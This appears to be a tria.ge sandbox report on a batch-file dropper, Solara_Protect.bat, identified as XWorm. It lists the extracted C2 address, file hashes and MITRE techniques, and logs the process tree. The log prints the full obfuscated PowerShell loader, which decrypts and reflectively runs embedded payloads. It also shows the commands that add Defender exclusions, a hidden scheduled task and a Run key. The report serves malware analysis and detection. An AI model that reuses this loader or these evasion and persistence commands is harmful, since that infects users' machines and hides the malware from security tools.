Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
92s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01/07/2024, 16:08
Static task
static1
Behavioral task
behavioral1
Sample
Solara_Protect.bat
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
Solara_Protect.bat
Resource
win10v2004-20240508-en
General
-
Target
Solara_Protect.bat
-
Size
3.1MB
-
MD5
49f8779d69c5572c5534a2b83f90334b
-
SHA1
edbeaff47d9b2fe4244b9710e014924189c086b6
-
SHA256
e3120bc12c0d1c82b3d719e8d095fcee2bba9571d2ad85e9e2b1b2dae921cc49
-
SHA512
a34cb31c8bdccced3167a1df44e6635cf66ddc544246115639727611aab578e576e98297be42d9496971da4b35db5f8359b8b06499009d885269e3ad3e5fd6bc
-
SSDEEP
3072:4VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVQKCoBA+17vLt/fC2:kTP3tivHMMMMMMWCYYYYU
Malware Config
Extracted
xworm
anyone-blogging.gl.at.ply.gg:22284
-
Install_directory
%Userprofile%
-
install_file
XClient.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/1012-50-0x000001CEEF760000-0x000001CEEF774000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
flow pid Process 34 1012 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 4392 powershell.exe 4592 powershell.exe 1012 powershell.exe 552 powershell.exe 4068 powershell.exe 3564 powershell.exe 2604 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4848 XClient.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\XClient.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4284 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 4392 powershell.exe 4392 powershell.exe 4592 powershell.exe 4592 powershell.exe 1012 powershell.exe 1012 powershell.exe 3564 powershell.exe 3564 powershell.exe 2604 powershell.exe 2604 powershell.exe 552 powershell.exe 552 powershell.exe 4068 powershell.exe 4068 powershell.exe 1012 powershell.exe 4848 XClient.exe 4848 XClient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 4592 powershell.exe Token: SeIncreaseQuotaPrivilege 4592 powershell.exe Token: SeSecurityPrivilege 4592 powershell.exe Token: SeTakeOwnershipPrivilege 4592 powershell.exe Token: SeLoadDriverPrivilege 4592 powershell.exe Token: SeSystemProfilePrivilege 4592 powershell.exe Token: SeSystemtimePrivilege 4592 powershell.exe Token: SeProfSingleProcessPrivilege 4592 powershell.exe Token: SeIncBasePriorityPrivilege 4592 powershell.exe Token: SeCreatePagefilePrivilege 4592 powershell.exe Token: SeBackupPrivilege 4592 powershell.exe Token: SeRestorePrivilege 4592 powershell.exe Token: SeShutdownPrivilege 4592 powershell.exe Token: SeDebugPrivilege 4592 powershell.exe Token: SeSystemEnvironmentPrivilege 4592 powershell.exe Token: SeRemoteShutdownPrivilege 4592 powershell.exe Token: SeUndockPrivilege 4592 powershell.exe Token: SeManageVolumePrivilege 4592 powershell.exe Token: 33 4592 powershell.exe Token: 34 4592 powershell.exe Token: 35 4592 powershell.exe Token: 36 4592 powershell.exe Token: SeIncreaseQuotaPrivilege 4592 powershell.exe Token: SeSecurityPrivilege 4592 powershell.exe Token: SeTakeOwnershipPrivilege 4592 powershell.exe Token: SeLoadDriverPrivilege 4592 powershell.exe Token: SeSystemProfilePrivilege 4592 powershell.exe Token: SeSystemtimePrivilege 4592 powershell.exe Token: SeProfSingleProcessPrivilege 4592 powershell.exe Token: SeIncBasePriorityPrivilege 4592 powershell.exe Token: SeCreatePagefilePrivilege 4592 powershell.exe Token: SeBackupPrivilege 4592 powershell.exe Token: SeRestorePrivilege 4592 powershell.exe Token: SeShutdownPrivilege 4592 powershell.exe Token: SeDebugPrivilege 4592 powershell.exe Token: SeSystemEnvironmentPrivilege 4592 powershell.exe Token: SeRemoteShutdownPrivilege 4592 powershell.exe Token: SeUndockPrivilege 4592 powershell.exe Token: SeManageVolumePrivilege 4592 powershell.exe Token: 33 4592 powershell.exe Token: 34 4592 powershell.exe Token: 35 4592 powershell.exe Token: 36 4592 powershell.exe Token: SeIncreaseQuotaPrivilege 4592 powershell.exe Token: SeSecurityPrivilege 4592 powershell.exe Token: SeTakeOwnershipPrivilege 4592 powershell.exe Token: SeLoadDriverPrivilege 4592 powershell.exe Token: SeSystemProfilePrivilege 4592 powershell.exe Token: SeSystemtimePrivilege 4592 powershell.exe Token: SeProfSingleProcessPrivilege 4592 powershell.exe Token: SeIncBasePriorityPrivilege 4592 powershell.exe Token: SeCreatePagefilePrivilege 4592 powershell.exe Token: SeBackupPrivilege 4592 powershell.exe Token: SeRestorePrivilege 4592 powershell.exe Token: SeShutdownPrivilege 4592 powershell.exe Token: SeDebugPrivilege 4592 powershell.exe Token: SeSystemEnvironmentPrivilege 4592 powershell.exe Token: SeRemoteShutdownPrivilege 4592 powershell.exe Token: SeUndockPrivilege 4592 powershell.exe Token: SeManageVolumePrivilege 4592 powershell.exe Token: 33 4592 powershell.exe Token: 34 4592 powershell.exe Token: 35 4592 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1012 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2628 wrote to memory of 4392 2628 cmd.exe 81 PID 2628 wrote to memory of 4392 2628 cmd.exe 81 PID 4392 wrote to memory of 4592 4392 powershell.exe 82 PID 4392 wrote to memory of 4592 4392 powershell.exe 82 PID 4392 wrote to memory of 4344 4392 powershell.exe 86 PID 4392 wrote to memory of 4344 4392 powershell.exe 86 PID 4344 wrote to memory of 1596 4344 WScript.exe 87 PID 4344 wrote to memory of 1596 4344 WScript.exe 87 PID 1596 wrote to memory of 1012 1596 cmd.exe 96 PID 1596 wrote to memory of 1012 1596 cmd.exe 96 PID 1012 wrote to memory of 3564 1012 powershell.exe 97 PID 1012 wrote to memory of 3564 1012 powershell.exe 97 PID 1012 wrote to memory of 2604 1012 powershell.exe 99 PID 1012 wrote to memory of 2604 1012 powershell.exe 99 PID 1012 wrote to memory of 552 1012 powershell.exe 101 PID 1012 wrote to memory of 552 1012 powershell.exe 101 PID 1012 wrote to memory of 4068 1012 powershell.exe 103 PID 1012 wrote to memory of 4068 1012 powershell.exe 103 PID 1012 wrote to memory of 4284 1012 powershell.exe 105 PID 1012 wrote to memory of 4284 1012 powershell.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Solara_Protect.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Local\Temp\Solara_Protect.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_694_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_694.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_694.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_694.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQhMtkbsVgtPIj+9hlMIsCH2Pou/2Q6I1Z8AAFEZJho='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ptE5ELI448W/24fFf9TlYQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KxrKd=New-Object System.IO.MemoryStream(,$param_var); $GIOzm=New-Object System.IO.MemoryStream; $hKjjR=New-Object System.IO.Compression.GZipStream($KxrKd, [IO.Compression.CompressionMode]::Decompress); $hKjjR.CopyTo($GIOzm); $hKjjR.Dispose(); $KxrKd.Dispose(); $GIOzm.Dispose(); $GIOzm.ToArray();}function execute_function($param_var,$param2_var){ $ZWVgR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EybCe=$ZWVgR.EntryPoint; $EybCe.Invoke($null, $param2_var);}$RvTul = 'C:\Users\Admin\AppData\Roaming\startup_str_694.bat';$host.UI.RawUI.WindowTitle = $RvTul;$KBDbz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($RvTul).Split([Environment]::NewLine);foreach ($OSADB in $KBDbz) { if ($OSADB.StartsWith(':: ')) { $uOIYZ=$OSADB.Substring(3); break; }}$payloads_var=[string[]]$uOIYZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4068
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\XClient.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:4284
-
-
-
-
-
-
C:\Users\Admin\XClient.exeC:\Users\Admin\XClient.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4848
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5df87d69dfbe30a72be8a41ba7020fdb1
SHA1319245bb2ad6416d3435d2857a746e54408a9822
SHA256964060b36bdbc812fdbc2c4efa24d60551e2f4b54a18384b1a21992246f0901e
SHA512cc7ee4f7042dacaec0d978205d75b06a02af1ebcd0e92af76a25961375e59a771be14af93c25a26585000555b7de603e7658069814b21e418a96e56d7c62e7fd
-
Filesize
1KB
MD5f8d49a4af7a844bfc7247d5670def557
SHA126ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA25661c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA5129e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD5b4b6d4cc52b5a3a71149b1f33d94d5de
SHA197d3dbdd24919eab70e3b14c68797cefc07e90dd
SHA256da8c02ce00d5b1e6d4c3667465c7bbc14d7cd5227eb634f3d9690afd488267fe
SHA512fc894f03709b83df7d2fca2779e1e60549078b67bcdbff0b61c8e5a802982210ae971309c1f92577573299288963ab5c95c6b38cbaedf53dc6062812c57a97af
-
Filesize
944B
MD55cfe303e798d1cc6c1dab341e7265c15
SHA1cd2834e05191a24e28a100f3f8114d5a7708dc7c
SHA256c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab
SHA512ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.1MB
MD549f8779d69c5572c5534a2b83f90334b
SHA1edbeaff47d9b2fe4244b9710e014924189c086b6
SHA256e3120bc12c0d1c82b3d719e8d095fcee2bba9571d2ad85e9e2b1b2dae921cc49
SHA512a34cb31c8bdccced3167a1df44e6635cf66ddc544246115639727611aab578e576e98297be42d9496971da4b35db5f8359b8b06499009d885269e3ad3e5fd6bc
-
Filesize
115B
MD501424a8aad5ae6f3e7abcc0fc44fec32
SHA17fe7d2e86c686864124d165386e47592f68250e3
SHA256f65eecba74f52e575591177c929f3bd5f28a34f8bcd60c7161c2686a51b9c511
SHA512e2f86628a5d03b6147524fd09810a792906274188f3b8da4e6199387d4128808889d3a01fcac81588e2b8d895c525349a2588c1cdfc602ca4fbbb19aaa25fcef
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b